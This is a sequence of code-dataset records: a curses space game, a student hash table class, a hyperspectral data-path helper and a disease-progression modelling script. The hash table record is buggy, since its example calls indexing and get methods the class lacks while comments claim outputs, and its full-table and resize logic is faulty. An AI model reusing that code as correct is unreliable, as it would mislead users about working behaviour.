stars:\n delay = random.randint(0, MAX_STAR_DELAY)\n stars[(x, y)] = [random.choice(STAR_SYMBOLS), delay]\n return stars\n\n def get_space_corrected_coords(self, x: int, y: int) -> tuple:\n x_min, y_min = BORDER_SIZE, BORDER_SIZE\n x_max = self.window_size.dx - 1 - BORDER_SIZE - self.space_frame_size.dx\n y_max = self.window_size.dy - 1 - BORDER_SIZE - self.space_frame_size.dy\n\n x = x_min if x < x_min else x\n x = x_max if x > x_max else x\n\n y = y_min if y < y_min else y\n y = y_max if y > y_max else y\n return x, y\n\n async def space_animation(self):\n for frame in cycle(self.space_frames):\n x, y = self.space_coords\n for obstacle in self.obstacles.values():\n if obstacle.has_collision(y, x, self.space_frame_size.dy,\n self.space_frame_size.dx):\n self.is_space_died = True\n return\n\n draw_frame(self.canvas, y, x, frame)\n await sleep(1)\n draw_frame(self.canvas, y, x, frame, negative=True)\n\n async def add_fire(self):\n while True:\n if self.is_shot and self.current_year > 2019:\n coroutine = fire(self.canvas, self.space_coords[1],\n self.space_coords[0] + 2,\n self.obstacles, self.destroyed_obstacle_ids)\n self.coroutines.append(coroutine)\n await sleep(1)\n\n async def fill_orbit_with_garbage(self):\n id_val = 0\n while True:\n if self.garbage_delay_tics < 0:\n await sleep(1)\n continue\n else:\n await sleep(self.garbage_delay_tics)\n\n max_x = self.window_size.dx - BORDER_SIZE\n start_x = randint(1, max_x - 1)\n frame = random.choice(TRASH_FRAMES)\n\n coroutine = fly_garbage(self.canvas, start_x, frame, id_val,\n self.obstacles,\n self.destroyed_obstacle_ids)\n self.coroutines.append(coroutine)\n id_val += 1\n\n def get_game_over_text_position(self):\n canvas_x_mid, canvas_y_mid = self.canvas_center_coords\n label_width_mid = len(self.game_over_frame[1]) / 2\n label_height_mid = len(self.game_over_frame) / 2\n\n x_mid = int(canvas_x_mid - label_width_mid)\n y_mid = int(canvas_y_mid - label_height_mid)\n return x_mid, y_mid\n\n async def show_game_over(self):\n x_pos, y_pos = self.get_game_over_text_position()\n frame_text = '\\n'.join(self.game_over_frame)\n while True:\n if self.is_space_died:\n draw_frame(self.canvas, y_pos, x_pos, frame_text)\n await asyncio.sleep(0)\n\n async def show_year_label(self):\n new_window = self.canvas.derwin(1, self.window_size.dx - 2, 1, 1)\n while not self.is_space_died:\n history_fact = PHRASES.get(self.current_year, '')\n text = f'Year: {self.current_year} {history_fact}'\n if history_fact:\n for _ in range(10):\n draw_frame(new_window, 0, 0, text)\n await sleep(1)\n else:\n draw_frame(new_window, 0, 0, text)\n await sleep(1)\n draw_frame(new_window, 0, 0, text, negative=True)\n\n def run(self, canvas):\n canvas.nodelay(True)\n curses.curs_set(False)\n\n self.canvas = canvas\n\n stars = self.generate_stars()\n for star_coords, attributes in stars.items():\n x, y = star_coords\n symbol, delay = attributes\n self.coroutines.append(star_blink(canvas, y, x, delay, symbol))\n\n self.space_coords = self.canvas_center_coords\n self.coroutines.append(self.space_animation())\n\n self.coroutines.append(self.fill_orbit_with_garbage())\n self.coroutines.append(self.add_fire())\n self.coroutines.append(self.show_game_over())\n self.coroutines.append(self.show_year_label())\n\n snap_index = 0\n while True:\n if not self.is_space_died:\n y_direction, x_direction, is_shot = read_controls(canvas)\n self.is_shot = is_shot and self.current_year > 2019\n\n x, y = self.space_coords\n v_x, v_y = self.space_x_speed, self.space_y_speed\n\n v_y, v_x = update_speed(v_y, v_x, y_direction, x_direction)\n x += v_x\n y += v_y\n\n self.space_x_speed, self.space_y_speed = v_x, v_y\n self.space_coords = self.get_space_corrected_coords(x, y)\n\n for coroutine in self.coroutines.copy():\n try:\n coroutine.send(None)\n except StopIteration:\n self.coroutines.remove(coroutine)\n if len(self.coroutines) == 0:\n break\n\n canvas.refresh()\n canvas.border()\n time.sleep(ANIMATION_DELAY)\n\n if not snap_index % (\n ONE_YEAR_DURATION_IN_SECONDS / ANIMATION_DELAY):\n self.current_year += 1\n snap_index += 1\n","repo_name":"MikkoArtik/AsyncSpaceGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43147098067","text":"class HashTable:\n def __init__(self):\n self.size = 128\n self.keys = [None] * self.size\n self.values = [None] * self.size\n\n def __growTable(self):\n self.size *= 2\n \n # Check if new size is a prime number\n is_prime = True\n for i in range(2, int(self.size ** 0.5) + 1):\n if self.size % i == 0:\n is_prime = False\n break\n if not is_prime:\n print(\"Warning: table size is not a prime number, increasing collision probability.\")\n \n new_keys = [None] * self.size\n new_values = [None] * self.size\n for i in range(len(self.keys)):\n if self.keys[i] is not None:\n index = self.__hash(self.keys[i])\n new_keys[index] = self.keys[i]\n new_values[index] = self.values[i]\n self.keys = new_keys\n self.values = new_values\n \n def insert(self, key, value):\n index = self.__hash(key)\n if self.keys[index] is None:\n self.keys[index] = key\n self.values[index] = value\n else:\n if self.keys[index] == key:\n self.values[index] = value # update value for existing key\n else:\n # collision, find next available slot\n next_index = self.__findNextSlot(index)\n while self.keys[next_index] is not None and self.keys[next_index] != key:\n next_index = self.__findNextSlot(next_index)\n if next_index == index:\n # Sequence of probing is exhausted, table is full\n try:\n # Try to cause the exception by generating a random key sequence\n import random\n random.seed(0)\n for i in range(self.size):\n random_key = str(random.random())\n self.insert(random_key, random_key)\n except Exception as e:\n # Log the problem\n import logging\n logging.basicConfig(filename='hash_table.log', level=logging.ERROR)\n logging.error(\"Exception: \" + str(e) + \", table size: \" + str(self.size))\n print(\"Error: table is full and sequence of probing is exhausted.\")\n return\n self.keys[next_index] = key\n self.values[next_index] = value\n\n def __hash(self, key):\n # hash function, returns an index between 0 and self.size-1\n return sum([ord(c) for c in key]) % self.size\n\n def __findNextSlot(self, index):\n # linear probing sequence\n return (index + 1) % self.size\n \n def showProbingSequence(self):\n for i in range(3):\n for j in range(3):\n for k in range(200):\n key = f'{i},{j},{k}'\n index = self.__hash(key)\n count = 0\n while self.keys[index] is not None and self.keys[index] != key:\n index = self.__findNextSlot(index)\n count += 1\n if count == self.size:\n print(f'Unable to insert key: {key} for condition {i},{j}')\n break\n if self.keys[index] is None:\n self.insert(key, key)\n print(f'Key {key} inserted with {count} probes for condition {i},{j}')\n else:\n print(f'Key {key} already exists with {count} probes for condition {i},{j}')\n \n # Create a HashTable instance\nht = HashTable()\n\n# Add some key-value pairs\nht.insert('key1', 'value1')\nht.insert('key2', 'value2')\nht.insert('key3', 'value3')\nht.insert('key4', 'value4')\n\n# Retrieve the values associated with the keys\nprint(ht['key1']) # Output: value1\nprint(ht.get('key2')) # Output: value2\nprint(ht.get('key5', 'default_value')) # Output: default_value\n\n# Show the probing sequence\nht.showProbingSequence()\n\n\n \n \n","repo_name":"cielobuezo/Algoritmos-","sub_path":"Cap_11/11.3/Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31576961527","text":"import os\nfrom collections.abc import Iterator\nfrom pathlib import Path\nfrom typing import Callable, Union\n\nfrom typing_extensions import Self\n\nfrom htc.settings import settings\nfrom htc.tivita.DataPath import DataPath\nfrom htc.tivita.DatasetSettings import DatasetSettings\n\n\nclass DataPathTivita(DataPath):\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"\n Constructs a generic data path for any kind of Tivita hyperspectral image folder.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.attributes = list(self.image_dir.relative_to(self.data_dir).parts[:-1])\n\n def build_path(self, base_folder: Path) -> Path:\n return base_folder / \"/\".join(self.attributes + [self.timestamp])\n\n @staticmethod\n def from_image_name(image_name: str) -> Self:\n raise NotImplementedError()\n\n @staticmethod\n def iterate(\n data_dir: Path,\n filters: list[Callable[[Self], bool]],\n annotation_name: Union[str, list[str]],\n ) -> Iterator[\"DataPathTivita\"]:\n # Settings of the dataset (shapes etc.) can be referenced by the DataPaths\n path_settings = None\n possible_paths = [data_dir] + list(data_dir.parents)\n for p in possible_paths:\n if (p / \"dataset_settings.json\").exists():\n path_settings = p / \"dataset_settings.json\"\n break\n\n dataset_settings = DatasetSettings(path_settings)\n intermediates_dir = settings.datasets.find_intermediates_dir(data_dir)\n\n # Keep a list of used image folders in case a folder contains both a cube file and a tiv archive\n used_folders = set()\n for root, dirs, files in os.walk(data_dir):\n dirs.sort() # Recurse in sorted order\n for f in sorted(files):\n if f.endswith((\"SpecCube.dat\", \".tiv\")) and root not in used_folders:\n path = DataPathTivita(Path(root), data_dir, intermediates_dir, dataset_settings, annotation_name)\n if all(f(path) for f in filters):\n yield path\n used_folders.add(root)\n","repo_name":"IMSY-DKFZ/htc","sub_path":"htc/tivita/DataPathTivita.py","file_name":"DataPathTivita.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"5676600643","text":"import sys\nimport numpy\nimport numpy as np\nimport colorsys\nfrom socket import gethostname\nimport time\nimport argparse\nimport os\nimport colorsys\nimport copy\nimport pandas as pd\nimport pickle\nimport random\nimport auxFunc\nimport scipy\nimport scipy.io as sio\nimport scipy.stats\n\n\n# sys.path.append(os.path.abspath(\"../diffEqModel/\"))\n\n\nparser = argparse.ArgumentParser(description='Launches voxel-wise/point-wise DPM on ADNI'\n 'using cortical thickness maps derived from MRI')\n\nparser.add_argument('--agg', dest='agg', type=int, default=0,\n help='agg=1 => plot figures without using Xwindows, for use on cluster where the plots cannot be displayed '\n ' agg=0 => plot with Xwindows (for use on personal machine)')\n\nparser.add_argument('--runIndex', dest='runIndex', type=int,\n default=1, help='index of run instance/process .. for cross-validation')\n\nparser.add_argument('--nrProc', dest='nrProc', type=int,\n default=1, help='# of processes')\n\nparser.add_argument('--modelToRun', dest='modelToRun', type=int,\n help='index of model to run')\n\nparser.add_argument('--cluster', action=\"store_true\",\n help='need to include this flag if runnin on cluster')\n\nparser.add_argument('--nrRows', dest='nrRows', type=int,\n help='nr of subfigure rows to plot at every iteration')\n\nparser.add_argument('--nrCols', dest='nrCols', type=int,\n help='nr of subfigure columns to plot at every iteration')\n\nparser.add_argument('--penalty', dest='penalty', type=float,\n help='penalty value for non-monotonic trajectories. between 0 (no effect) and 10 (strong effect). ')\n\nparser.add_argument('--regData', action=\"store_true\", default=False,\n help=' add this flag to regenerate the data')\n\nparser.add_argument('--runPartStd', dest='runPartStd', default='RR',\n help=' choose whether to (R) run or (L) load from the checkpoints: '\n 'either LL, RR, LR or RL. ')\n\nparser.add_argument('--tinyData', action=\"store_true\", default=False,\n help=' only run on a tiny subset of the data: around 200/1980 subjects')\n\n\nargs = parser.parse_args()\n\nif args.agg:\n # print(matplotlib.__version__)\n import matplotlib\n matplotlib.use('Agg')\n # print(asds)\n\nimport genSynthData\nimport ParHierModel\nimport Plotter\nfrom auxFunc import *\nimport evaluationFramework\nfrom matplotlib import pyplot as pl\nfrom env import *\n\nfrom drcValidFuncs import *\nfrom tadpoleDataLoader import *\nfrom drcDataLoader import *\nfrom tadpoleDrcPrepData import *\n\n\n\n# DKT OTHER_MODEL VALID TRAINING\n# circle triangle diagonal cross square\n#\n# ADNI CTL green\n# MCI orange\n# AD red\n# DRC CTL yellow\n# PCA magenta\n# AD blue\n\nplotTrajParams = {}\nplotTrajParams['SubfigTrajWinSize'] = (1600,900)\nplotTrajParams['nrRows'] = args.nrRows\nplotTrajParams['nrCols'] = args.nrCols\nplotTrajParams['diagColors'] = {CTL:'g', MCI:'#FFA500', AD:'r',\n CTL2:'y', PCA:'m', AD2:'b', CTL_OTHER_MODEL:'k', PCA_OTHER_MODEL:'b',\n CTL_DKT:'g', PCA_DKT:'r'}\nplotTrajParams['diagScatterMarkers'] = {CTL:'s', MCI:'s', AD:'s',\n CTL2:'s', PCA:'s', AD2:'s', CTL_OTHER_MODEL:'^', PCA_OTHER_MODEL:'^',\n CTL_DKT: 'o', PCA_DKT: 'o'}\nplotTrajParams['legendCols'] = 4\nplotTrajParams['diagLabels'] = {CTL:'CTL ADNI', MCI:'MCI ADNI', AD:'tAD ADNI',\n CTL2:'CTL LOCAL', PCA:'PCA LOCAL', AD2:'tAD LOCAL', CTL_OTHER_MODEL:'CTL LOCAL - No DKT',\n PCA_OTHER_MODEL:'PCA LOCAL - No DKT', CTL_DKT:'CTL - DTK', PCA_DKT:'PCA - DTK'}\n\n# plotTrajParams['freesurfPath'] = freesurfPath\n# plotTrajParams['blenderPath'] = blenderPath\nplotTrajParams['isSynth'] = False\nplotTrajParams['padTightLayout'] = 0.4\n\nif args.agg:\n plotTrajParams['agg'] = True\nelse:\n plotTrajParams['agg'] = False\n\nhostName = gethostname()\nif hostName == 'razvan-Inspiron-5547':\n height = 350\nelse: #if hostName == 'razvan-Precision-T1700':\n height = 450\n\n\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 50)\npd.set_option('display.width', 5000)\n\n\ndef visDataHist(dataDfAll):\n\n unqDiags = np.unique(dataDfAll.diag)\n biomks = dataDfAll.loc[:, 'CDRSB':].columns.tolist()\n for b in range(len(biomks)):\n\n fig = pl.figure(5)\n fig.clf()\n for d in unqDiags:\n pl.hist(dataDfAll.loc[dataDfAll.diag == d, biomks[b]].dropna(), bins=15,\n color=plotTrajParams['diagColors'][d], label=plotTrajParams['diagLabels'][d], alpha=0.5)\n\n pl.legend(loc='west')\n pl.title(biomks[b])\n\n fig.show()\n os.system('mkdir -p resfiles/tad-drc')\n fig.savefig('resfiles/tad-drc/%d_%s.png' % (b, biomks[b]))\n\n\ndef main():\n\n # don't turn this on unless I add cognitive markers in the DRC dataset.\n addExtraBiomk = False\n\n np.random.seed(1)\n random.seed(1)\n pd.set_option('display.max_columns', 50)\n tinyData = args.tinyData\n\n finalDataFile = 'data_processed/tadDrc.npz'\n expName = 'tadDrc'\n\n if args.tinyData:\n finalDataFile = finalDataFile.split('.')[0] + 'Tiny.npz'\n expName = expName.split('.')[0] + 'Tiny'\n\n if addExtraBiomk:\n finalDataFile = finalDataFile.split('.')[0] + 'Cog.npz'\n expName = expName.split('.')[0] + 'Cog'\n\n regenerateData = (not os.path.isfile(finalDataFile)) or args.regData\n if regenerateData:\n prepareData(finalDataFile, tinyData, addExtraBiomk)\n # print(dada)\n\n\n\n ds = pickle.load(open(finalDataFile, 'rb'))\n dataDfAll = ds['dataDfAll']\n regParamsICV = ds['regParamsICV']\n regParamsAge = ds['regParamsAge']\n regParamsGender = ds['regParamsGender']\n regParamsDataset = ds['regParamsDataset']\n X = ds['X']\n Y = ds['Y']\n RID = np.array(ds['RID'], int)\n labels = ds['list_biomarkers']\n diag = ds['diag']\n\n outFolder = 'resfiles/'\n\n params = {}\n\n av45InListBiomk = np.array([True for x in ds['list_biomarkers'] if x.startswith('AV1451')]).any()\n if av45InListBiomk:\n nrBiomkInFuncUnits = 5\n else:\n nrBiomkInFuncUnits = 4\n\n # print('dataDfAll', dataDfAll)\n\n\n\n nrDis = 2 # nr of diseases\n params['nrDis'] = nrDis\n\n # change the order of the functional units so that the hippocampus and occipital are fitted first\n unitPermutation = [5,3,2,1,4,0]\n\n nrFuncUnits = 6\n mapBiomkToFuncUnits = np.array((unitPermutation * nrBiomkInFuncUnits))\n nrExtraBiomk = 0\n\n if addExtraBiomk:\n nrExtraBiomk = 5\n nrFuncUnits += nrExtraBiomk # add the 3 extra cog markers to a unique functional unit\n\n mapBiomkToFuncUnits = np.array((unitPermutation * nrBiomkInFuncUnits) + list(range(nrFuncUnits-nrExtraBiomk, nrFuncUnits)))\n\n # print(mapBiomkToFuncUnits)\n # print(dasdas)\n\n unitNames = [l.split(' ')[-1] for l in labels]\n unitNames = [unitNames[i] for i in unitPermutation]\n if addExtraBiomk:\n extraBiomkNames = ['ADAS13', 'CDRSB', 'RAVLT', 'MMSE', 'FAQ']\n unitNames += extraBiomkNames\n assert len(extraBiomkNames) == nrExtraBiomk\n\n nrBiomk = mapBiomkToFuncUnits.shape[0]\n biomkInFuncUnit = [0 for u in range(nrFuncUnits + 1)]\n for u in range(nrFuncUnits):\n biomkInFuncUnit[u] = np.where(mapBiomkToFuncUnits == u)[0]\n\n # if addExtraBiomk:\n # # add extra entry with other biomks to be added in the disease models\n # extraBiomkNames = ['ADAS13', 'CDRSB', 'RAVLT', 'MMSE', 'FAQ']\n # biomkInFuncUnit[nrFuncUnits] = np.array([nrBiomk-3, nrBiomk-2, nrBiomk-1])\n # else:\n\n biomkInFuncUnit[nrFuncUnits] = np.array([]) # need to leave this as empty list\n\n plotTrajParams['biomkInFuncUnit'] = biomkInFuncUnit\n plotTrajParams['labels'] = labels\n plotTrajParams['nrRowsFuncUnit'] = 3\n plotTrajParams['nrColsFuncUnit'] = 4\n plotTrajParams['colorsTrajBiomkB'] = [colorsys.hsv_to_rgb(hue, 1, 1) for hue in\n np.linspace(0, 1, num=nrBiomk, endpoint=False)]\n plotTrajParams['colorsTrajUnitsU'] = [colorsys.hsv_to_rgb(hue, 1, 1) for hue in\n np.linspace(0, 1, num=nrFuncUnits, endpoint=False)]\n plotTrajParams['nrBiomk'] = nrBiomk\n params['nrBiomk'] = nrBiomk\n\n # plotTrajParams['yNormMode'] = 'zScoreTraj'\n # plotTrajParams['yNormMode'] = 'zScoreEarlyStageTraj'\n plotTrajParams['yNormMode'] = 'unscaled'\n\n # if False, plot estimated traj. in separate plot from true traj.\n plotTrajParams['allTrajOverlap'] = False\n\n params['nrFuncUnitsImgOnly'] = nrFuncUnits - nrExtraBiomk\n params['unitNames'] = unitNames\n params['runIndex'] = args.runIndex\n params['nrProc'] = args.nrProc\n params['cluster'] = args.cluster\n params['plotTrajParams'] = plotTrajParams\n params['penaltyUnits'] = args.penalty\n params['penaltyDis'] = args.penalty\n params['nrFuncUnits'] = nrFuncUnits\n params['biomkInFuncUnit'] = biomkInFuncUnit\n params['mapBiomkToFuncUnits'] = mapBiomkToFuncUnits\n params['labels'] = labels\n params['nrExtraBiomk'] = nrExtraBiomk\n\n params['X'] = X\n params['Y'] = Y\n params['RID'] = RID\n # print('RID', RID)\n # print(ads)\n params['diag'] = diag\n params['plotTrajParams']['diag'] = params['diag']\n params['Xvalid'] = ds['Xvalid']\n params['Yvalid'] = ds['Yvalid']\n params['RIDvalid'] = ds['RIDvalid']\n params['diagValid'] = ds['diagValid']\n params['dataDfAll'] = dataDfAll\n params['visitIndices'] = ds['visitIndices']\n params['visitIndicesValid'] = ds['visitIndicesValid']\n\n # params['nrGlobIterUnit'] = 10 # these parameters are specific for the Joint Model of Disease (JMD)\n # params['iterParamsUnit'] = 60\n # params['nrGlobIterDis'] = 10\n # params['iterParamsDis'] = 60\n\n # by default we have no priors\n params['priors'] = None\n\n # print([params['X'][b2][subjIndCurrDis[s]] for b2 in range(params['nrBiomk'])])\n # print([params['Y'][b2][subjIndCurrDis[s]] for b2 in range(params['nrBiomk'])])\n\n for s in range(len(X[0])):\n entriesCurrSubj = [X[b][s].shape[0] > 0 for b in range(30)]\n nrEntriesPerSubj = np.sum(entriesCurrSubj)\n if nrEntriesPerSubj == 0:\n print(s, entriesCurrSubj)\n print(dadsa)\n\n print(labels)\n # print(dasda)\n\n ############# set priors for specific models ################\n\n # params['priors'] = dict(prior_length_scale_mean_ratio=0.33, # mean_length_scale = (self.maxX-self.minX)/3\n # prior_length_scale_std=1e-4, prior_sigma_mean=2,prior_sigma_std = 1e-3,\n # prior_eps_mean = 1, prior_eps_std = 1e-2)\n # params['priors'] = dict(prior_length_scale_mean_ratio=0.9, # mean_length_scale = (self.maxX-self.minX)/3\n # prior_length_scale_std=1e-4, prior_sigma_mean=3, prior_sigma_std=1e-3,\n # prior_eps_mean=0.1, prior_eps_std=1e-6)\n\n params['priorsUnitModelsMarcoModel'] = [dict(prior_length_scale_mean_ratio=0.05, # mean_length_scale = (self.maxX-self.minX)/3\n prior_length_scale_std=1e-6, prior_sigma_mean=0.5, prior_sigma_std=1e-3,\n prior_eps_mean=0.1, prior_eps_std=1e-6) for u in range(nrFuncUnits)]\n\n transitionTimePriorMean = 1 # in DPS 0-1 space, prior mean\n transitionTimePriorMin = 0.9\n transitionTimePriorMax = 1.1\n\n bPriorShape, bPriorRate = getGammShapeRateFromTranTime(\n transitionTimePriorMean, transitionTimePriorMin, transitionTimePriorMax)\n\n transitionTimePriorMeanAD = 0.1 # using months instead of years\n transitionTimePriorMinAD = 0.09\n transitionTimePriorMaxAD = 0.11\n\n bPriorShapeDisAD, bPriorRateDisAD = getGammShapeRateFromTranTime(\n transitionTimePriorMeanAD, transitionTimePriorMinAD, transitionTimePriorMaxAD)\n\n _, bPriorStdAD = getMeanStdBFromTranTime(\n transitionTimePriorMeanAD, transitionTimePriorMinAD, transitionTimePriorMaxAD)\n\n transitionTimePriorMeanPCA = 500\n transitionTimePriorMinPCA = 400\n transitionTimePriorMaxPCA = 600\n\n bPriorShapeDisPCA, bPriorRateDisPCA = getGammShapeRateFromTranTime(\n transitionTimePriorMeanPCA, transitionTimePriorMinPCA, transitionTimePriorMaxPCA)\n\n _, bPriorStdPCA = getMeanStdBFromTranTime(\n transitionTimePriorMeanPCA, transitionTimePriorMinPCA, transitionTimePriorMaxPCA)\n\n params['priorsDisModels'] = [0, 0]\n # priors for tAD\n params['priorsDisModels'][0] = dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n shapeB=bPriorShapeDisAD, rateB=bPriorRateDisAD, stdPerturbB=bPriorStdAD, timeShiftStd=20000)\n # priors for PCA\n params['priorsDisModels'][1] = dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n shapeB=bPriorShapeDisPCA, rateB=bPriorRateDisPCA, stdPerturbB=bPriorStdPCA, timeShiftStd=20000)\n\n # params['priorsUnitModels'] = [dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n # shapeB=2, rateB=2, timeShiftStd=20000) for d in range(nrDis)]\n params['priorsUnitModels'] = [dict(meanA=1, stdA=1e-5, meanD=0, stdD=1e-5,\n shapeB=bPriorShape, rateB=bPriorRate, timeShiftStd=20000) for u in range(nrFuncUnits-nrExtraBiomk)]\n\n if nrExtraBiomk > 0:\n params['priorsUnitModelsLinear'] = [dict(meanA=1, stdA=0.1, meanB=0, stdB=0.1, timeShiftStd=20000)\n for u in range(nrExtraBiomk)]\n params['priorsUnitModels'] += params['priorsUnitModelsLinear']\n\n\n bPriorShapeNoDKT, bPriorRateNoDKT = getGammShapeRateFromTranTime(\n transitionTimePriorMean=50, transitionTimePriorMin=40, transitionTimePriorMax=60)\n params['priorsNoDKTSigmoid'] = dict(meanA=1, stdA=1e-5, meanD=0, stdD=1e-5,\n shapeB=bPriorShapeNoDKT, rateB=bPriorRateNoDKT, timeShiftStd=20000)\n\n ######################\n\n nrBiomkDisModel = nrFuncUnits\n params['nrBiomkDisModel'] = nrBiomkDisModel\n\n if addExtraBiomk:\n params['plotTrajParams']['unitNames'] = unitNames + labels[-3:]\n else:\n params['plotTrajParams']['unitNames'] = unitNames\n\n # map which diagnoses belong to which disease\n # first disease has CTL+AD, second disease has CTL2+PCA\n params['diagsSetInDis'] = [np.array([CTL, MCI, AD, AD2]), np.array([CTL2, PCA])]\n params['disLabels'] = ['tAD', 'PCA']\n # if addExtraBiomk:\n # params['otherBiomkPerDisease'] = [[nrBiomk-3,nrBiomk-2, nrBiomk-1], []] # can also add 3 extra cognitive tests\n # else:\n # params['otherBiomkPerDisease'] = [[], []]\n\n params['binMaskSubjForEachDisD'] = [np.in1d(params['diag'],\n params['diagsSetInDis'][disNr]) for disNr in range(nrDis)]\n\n eps = 0.001\n nrXPoints = 50\n params['trueParams'] = {}\n subShiftsS = np.zeros(RID.shape[0])\n # params['trueParams']['trueSubjDysfuncScoresSU'] = np.zeros((RID.shape[0],nrFuncUnits))\n trueDysfuncXsX = np.linspace(0,1, nrXPoints)\n # params['trueParams']['trueTrajXB'] = eps * np.ones((nrXPoints, nrBiomk))\n trueTrajFromDysXB = eps * np.ones((nrXPoints, nrBiomk))\n\n trueLineSpacedDPSsX = np.linspace(-10,10, nrXPoints)\n trueTrajPredXB = eps * np.ones((nrXPoints,nrBiomk))\n trueDysTrajFromDpsXU = eps * np.ones((nrXPoints,nrBiomkDisModel))\n\n scalingBiomk2B = np.zeros((2, nrBiomk))\n scalingBiomk2B[1,:] = 1\n\n trueParamsFuncUnits = [0 for _ in range(nrFuncUnits)]\n for f in range(nrFuncUnits):\n trueParamsFuncUnits[f] = dict(xsX=trueDysfuncXsX, ysXB=trueTrajFromDysXB[:, biomkInFuncUnit[f]],\n subShiftsS=subShiftsS,\n scalingBiomk2B=scalingBiomk2B[:, biomkInFuncUnit[f]])\n\n # disease specific\n trueParamsDis = [0 for _ in range(nrDis)]\n for d in range(nrDis):\n trueParamsDis[d] = dict(xsX=trueLineSpacedDPSsX, ysXU=trueDysTrajFromDpsXU, ysXB=trueTrajPredXB,\n subShiftsS=np.zeros(np.sum(np.in1d(params['diag'],params['diagsSetInDis'][d]))),\n scalingBiomk2B=scalingBiomk2B)\n\n\n # for DKT DPMs\n params['trueParamsFuncUnits'] = trueParamsFuncUnits\n params['trueParamsDis'] = trueParamsDis\n\n # simpler non-DKT DPMs\n params['trueParams'] = dict(xsX=trueLineSpacedDPSsX, ysXU = trueTrajPredXB, ysXB = trueTrajPredXB,\n subShiftsS=subShiftsS, scalingBiomk2B=scalingBiomk2B)\n params['plotTrajParams']['trueParams'] = params['trueParams']\n\n print('diag', params['diag'].shape[0])\n # print(adsa)\n print('X[0]',len(params['X'][0]))\n assert params['diag'].shape[0] == len(params['X'][0])\n # assert params['diag'].shape[0] == len(params['trueParams']['subShiftsTrueMarcoFormatS'])\n # assert params['diag'].shape[0] == len(params['trueParams']['trueSubjDysfuncScoresSU'])\n\n # if args.penalty is not None:\n # if np.abs(args.penalty - int(args.penalty) < 0.00001):\n # expName = '%sPen%d' % (expName, args.penalty)\n # else:\n # expName = '%sPen%.1f' % (expName, args.penalty)\n\n # params['runPartStd'] = ['L', 'L']\n params['runPartStd'] = args.runPartStd\n params['runPartMain'] = ['R', 'I', 'I'] # [mainPart, plot, stage]\n params['masterProcess'] = args.runIndex == 0\n\n expNameDisOne = '%s' % expName\n modelNames, res = evaluationFramework.runModels(params, expName,\n args.modelToRun, runAllExpTadpoleDrc)\n\n\n if params['masterProcess']:\n printRes(modelNames, res, plotTrajParams, params)\n\n\ndef printRes(modelNames, res, plotTrajParams, params):\n #nrModels = len(modelNames)\n\n nrDis = params['nrDis']\n modelNames += ['Lin', 'Spline', 'Multivar']\n officialNames = {'JMD': 'DKT', 'Sig': 'Latent stage', 'Lin': 'Linear',\n 'Spline': 'Spline', 'Multivar': 'Multivariate'}\n\n d = 0\n\n disNrValid = 1\n disNrsValid = [disNrValid]\n\n biomkNames = res[0]['metrics']['labelsNonMri']\n\n\n resDf = pd.DataFrame(index=range(12 * len(disNrsValid)), columns=['Model'] + biomkNames)\n\n c = 0\n\n # dpmObjStd[s].plotter.plotAllBiomkDisSpace(dpmObjStd[s], params, disNr=0)\n # for disNrValid in disNrsValid:\n print('%d-%d training on dis %s validation on disease %s' % (d, disNrValid,\n params['disLabels'][0], params['disLabels'][1]))\n\n dktIndex = 0\n sigIndex = 1\n linIndex = 2\n splineIndex = 3\n multivarIndex = 4\n\n # print('##### biomk prediction ######')\n nrModels = len(officialNames)\n mseMUB = list(range(nrModels))\n mseMeanMU = list(range(nrModels))\n mseStdMU = list(range(nrModels))\n\n corrMUB = list(range(nrModels))\n corrMeanMU = list(range(nrModels))\n corrStdMU = list(range(nrModels))\n pvalsMU = list(range(nrModels))\n\n for m in range(len(res)):\n # print(res[m]['metrics'])\n # print(res[m]['metrics'][d])\n mseMUB[m] = res[m]['metrics']['dpm']['mseUB']\n mseMeanMU[m] = np.nanmean(mseMUB[m], axis=1)\n mseStdMU[m] = np.nanstd(mseMUB[m], axis=1)\n\n corrMUB[m] = res[m]['metrics']['dpm']['corrUB']\n corrMeanMU[m] = np.nanmean(corrMUB[m], axis=1)\n corrStdMU[m] = np.nanstd(corrMUB[m], axis=1)\n\n mseMUB[linIndex] = res[0]['metrics']['lin']['mseUB']\n mseMeanMU[linIndex] = np.nanmean(mseMUB[linIndex], axis=1)\n mseStdMU[linIndex] = np.nanstd(mseMUB[linIndex], axis=1)\n\n mseMUB[splineIndex] = res[0]['metrics']['spline']['mseUB']\n mseMeanMU[splineIndex] = np.nanmean(mseMUB[splineIndex], axis=1)\n mseStdMU[splineIndex] = np.nanstd(mseMUB[splineIndex], axis=1)\n\n mseMUB[multivarIndex] = res[0]['metrics']['multivar']['mseUB']\n mseMeanMU[multivarIndex] = np.nanmean(mseMUB[multivarIndex], axis=1)\n mseStdMU[multivarIndex] = np.nanstd(mseMUB[multivarIndex], axis=1)\n\n\n corrMUB[linIndex] = res[0]['metrics']['lin']['corrUB']\n corrMeanMU[linIndex] = np.nanmean(corrMUB[linIndex], axis=1)\n corrStdMU[linIndex] = np.nanstd(corrMUB[linIndex], axis=1)\n\n corrMUB[splineIndex] = res[0]['metrics']['spline']['corrUB']\n corrMeanMU[splineIndex] = np.nanmean(corrMUB[splineIndex], axis=1)\n corrStdMU[splineIndex] = np.nanstd(corrMUB[splineIndex], axis=1)\n\n corrMUB[multivarIndex] = res[0]['metrics']['multivar']['corrUB']\n corrMeanMU[multivarIndex] = np.nanmean(corrMUB[multivarIndex], axis=1)\n corrStdMU[multivarIndex] = np.nanstd(corrMUB[multivarIndex], axis=1)\n\n # Perform Bonferroni correction\n sigLevel = 0.05/(6*2*nrModels)\n\n print('##### mean squared error and rank correlation ######')\n resDf.iloc[c, 0] = 'Prediction Error (MSE)'\n c += 1\n modelIndxs = [dktIndex, sigIndex, multivarIndex, 